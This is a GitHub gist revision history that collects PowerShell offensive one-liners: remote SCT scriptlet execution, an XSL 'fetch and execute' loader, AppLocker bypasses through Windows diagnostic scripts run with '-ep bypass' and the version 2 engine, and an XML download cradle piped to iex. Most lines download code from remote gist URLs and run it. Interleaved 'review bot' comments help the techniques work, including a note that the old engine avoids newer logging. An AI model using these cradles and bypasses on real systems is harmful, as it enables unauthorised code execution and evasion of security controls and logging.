Revisions
bohops revised this gist
Apr 16, 2018 . No changes.There are no files selected for viewing
bohops revised this gist
Feb 21, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,6 @@ ############################################################################## ### Powershell Xml/Xsl Assembly "Fetch & Execute" ### [https://twitter.com/bohops/status/966172175555284992] $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; -
bohops revised this gist
Feb 21, 2018 . 1 changed file with 8 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,11 +1,17 @@ ############################################################################## ### Powershell Xml/Xsl Assembly "Fetch & Execute" ### [https://twitter.com/bohops/status/965670898379476993] $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; ############################################################################## ### Powershell VBScript Assembly SCT "Fetch & Execute" ### [https://twitter.com/bohops/status/965670898379476993] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct').Exec(0) ############################################################################## ### Powershell JScript Assembly SCT "Fetch & Execute" ### [https://twitter.com/bohops/status/965085651199840258] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) -
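Review bot: In the added Xml/Xsl "Fetch & Execute" block, `$x.Transform(...,'z');del z` writes the transform output to a file named z in the current directory before removing it, and `$s.EnableScript=1` is the XsltSettings knob that lets script embedded in the fetched stylesheet compile and run; neither is mentioned in the header. I'd add `### NOTE: EnableScript=1 permits stylesheet-embedded script to run; Transform() writes its result to .\z (transient on-disk artifact) before 'del z'` so a reader knows which setting does the work and what a defender could look for. `$true` instead of `1` for a boolean property would also read more clearly, though PowerShell coerces it.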
bohops revised this gist
Feb 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -41,5 +41,5 @@ SyncInvoke notepad.exe ### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239] $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.github.com/bohops/0e7f900bba16181f01575bdd43b383e9/raw/1d4913d032903f0aa9d8e9ab62891745ee814043/notepad.xml") $a.command.a.execute | iex -
bohops revised this gist
Feb 20, 2018 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,13 +2,13 @@ ### Powershell VBScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965670898379476993] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct').Exec(0) ############################################################################## ### Powershell JScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965085651199840258] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) ############################################################################## ### Powershell JScript Assembly ActiveXObject Script Execution -
bohops revised this gist
Feb 20, 2018 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,13 +2,13 @@ ### Powershell VBScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965670898379476993] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/12ddbfab98781eaf23e1bd2898dd24fe75fb251a/notepad.sct').Exec(0) ############################################################################## ### Powershell JScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965085651199840258] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://gist.github.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/12ddbfab98781eaf23e1bd2898dd24fe75fb251a/notepad.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) ############################################################################## ### Powershell JScript Assembly ActiveXObject Script Execution -
bohops revised this gist
Feb 20, 2018 . 1 changed file with 18 additions and 3 deletions.There are no files selected for viewing
@@ -1,30 +1,45 @@ ############################################################################## ### Powershell VBScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965670898379476993] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0) ############################################################################## ### Powershell JScript Assembly SCT Execution ### [https://twitter.com/bohops/status/965085651199840258] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) ############################################################################## ### Powershell JScript Assembly ActiveXObject Script Execution ### [@gabemarshall - https://gist.github.com/gabemarshall/a708aad5b70a31d0bec19b86a1b73c28/raw/44e74c465b5585dc7a941103aa8742b928933ccf/jscript.ps1] [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()); ############################################################################## ### Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts ### [https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/] powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ..\..\..\..\path\assembly.exe [name.space]::executesomething() ############################################################################## ### Command Invocation w/ PowerShell Diagnostic Scripts ### 
[https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/] powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module CL_Invocation.ps1 SyncInvoke notepad.exe ############################################################################## ### PowerShell CL Download Cradle ### [@subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d] ### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239] $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.github.com/bohops/0e7f900bba16181f01575bdd43b383e9/raw/aefe626d2571e5c22e30e77bf36b29a4f36af49e/notepad.txt") $a.command.a.execute | iex -
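Review bot: Both diagnostic-script blocks open with `powershell -v 2 -ep bypass`, and nothing documents why the 2.0 engine is requested or that it is a prerequisite. The -v 2 switch only works where the Windows PowerShell 2.0 engine (an optional feature that depends on .NET 3.5) is installed; where it is absent I believe the launch errors rather than falling back — confirm. I'd add `### requires the Windows PowerShell 2.0 engine feature (.NET 3.5); -v 2 is used to avoid the newer engine's logging` above the first such line, stating the reason instead of leaving it implied.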
bohops revised this gist
Feb 20, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -21,7 +21,7 @@ cd C:\windows\diagnostics\system\AERO import-module CL_Invocation.ps1 SyncInvoke notepad.exe ### PowerShell CL Download Cradle ### [@subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d] ### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239] -
bohops revised this gist
Feb 20, 2018 . 1 changed file with 13 additions and 5 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,22 +1,30 @@ ### SCT VBScript/JScript Execution ### [ [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0) [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) ### Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ..\..\..\..\path\assembly.exe [name.space]::executesomething() ### Command Invocation w/ PowerShell Diagnostic Scripts powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module CL_Invocation.ps1 SyncInvoke notepad.exe ### PowerShell v5+ Download Cradle ### [@subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d] ### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239] $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt") $a.command.a.execute | iex -
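Review bot: The added download cradle navigates `$a.command.a.execute` and pipes the result to `iex`, but nothing says what the fetched document must look like. From the property chain it appears to expect `<command><a><execute>…</execute></a></command>` with the PowerShell to run as the text of `<execute>`; I'd state that in the header: `### expects <command><a><execute>PS CODE</execute></a></command>; the text of <execute> is piped to iex`. Whatever that file contains is executed verbatim, so pinning the raw-gist URL to a commit SHA, as done here, is worth keeping.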
bohops revised this gist
Feb 20, 2018 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,7 @@ ###SCT VBScript/JScript Execution [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0) [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) -
bohops revised this gist
Feb 20, 2018 . 1 changed file with 11 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,13 +1,21 @@ ###SCT VBScript/JScript Execution [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0) [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) ###Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ..\..\..\..\path\assembly.exe [name.space]::executesomething() ###Command Invocation w/ PowerShell Diagnostic Scripts powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module CL_Invocation.ps1 SyncInvoke notepad.exe -
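Review bot: The new Command Invocation block uses `import-module CL_Invocation.ps1` while the block above it uses `import-module .\CL_LoadAssembly.ps1`; without the `.\` prefix Import-Module resolves the name against PSModulePath rather than the current directory, so this line most likely fails even after the `cd`. Change it to `import-module .\CL_Invocation.ps1` to match the sibling block. A short comment above `SyncInvoke notepad.exe` noting that notepad.exe is a placeholder for the command to run would also help.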
bohops created this gist
Feb 20, 2018 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,13 @@ #SCT VBScript/JScript Execution [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://path/to/some.sct').Exec(0) [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://path/to/some.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) #Loading .Net/C# Assemblies to Bypass AppLocker Default Rules powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ..\..\..\..\path\assembly.exe [name.space]::executesomething()
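Review bot: `[Reflection.Assembly]::LoadWithPartialName(...)` in the two SCT one-liners is marked obsolete in .NET and returns $null instead of throwing when the assembly is not found, so a failed load only surfaces later as an unrelated type-not-found error on `[Microsoft.VisualBasic.Interaction]` or `[Microsoft.JScript.Eval]`. `Add-Type -AssemblyName Microsoft.VisualBasic` (and `Microsoft.JScript`) is the supported form and fails at the load. The relative path in `LoadAssemblyFromPath ..\..\..\..\path\assembly.exe` resolves from C:\windows\diagnostics\system\AERO to C:\path\assembly.exe, which deserves a comment: `# four levels up from ...\system\AERO is C:\ — replace path\assembly.exe with the real location`.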